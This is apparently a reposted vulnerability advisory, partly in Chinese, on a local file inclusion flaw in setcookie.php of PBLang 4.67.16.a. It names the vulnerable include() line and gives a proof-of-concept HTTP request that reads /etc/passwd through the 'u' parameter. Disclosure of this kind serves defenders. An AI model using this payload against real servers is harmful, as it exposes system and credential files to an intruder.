标题: [PBLang local file include vulnerability] 关键词: ["Software PBLang 4.67.16.a"] 作者: ~Pseudo: [Number 7]; 软件 下载 地址: [http://garr.dl.sourceforge.net/project/pblang/Full%20versions/PBLang%204.67.16.a%20no%20graphics/PBLang-4.67.16.a-nographics.zip] 影响版本: [4.67.16.a] 测试平台: [wINDOWS, Linux ] ______________________________________________________________________________________ 证明: 位于setcookie.php include($dbpath."/members/".$u); In order to successfully perform this attack the attacker must have the full path where the files are uploaded, and it is easy to get making a request like this: GET http:// www.2cto.com /path/setcookie.php?u=etc/passwd HTTP/1.1 Cookie: eXtplorer=eRlQPZSWiGt2zRpFlXr6qCgja6DiLumU Host: localhost:80 Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) For requests like this i use acunetix :D ___________________________________________________
查看更多关于PBLang本地文件包含缺陷及修复 - 网站安全 - 自学的详细内容...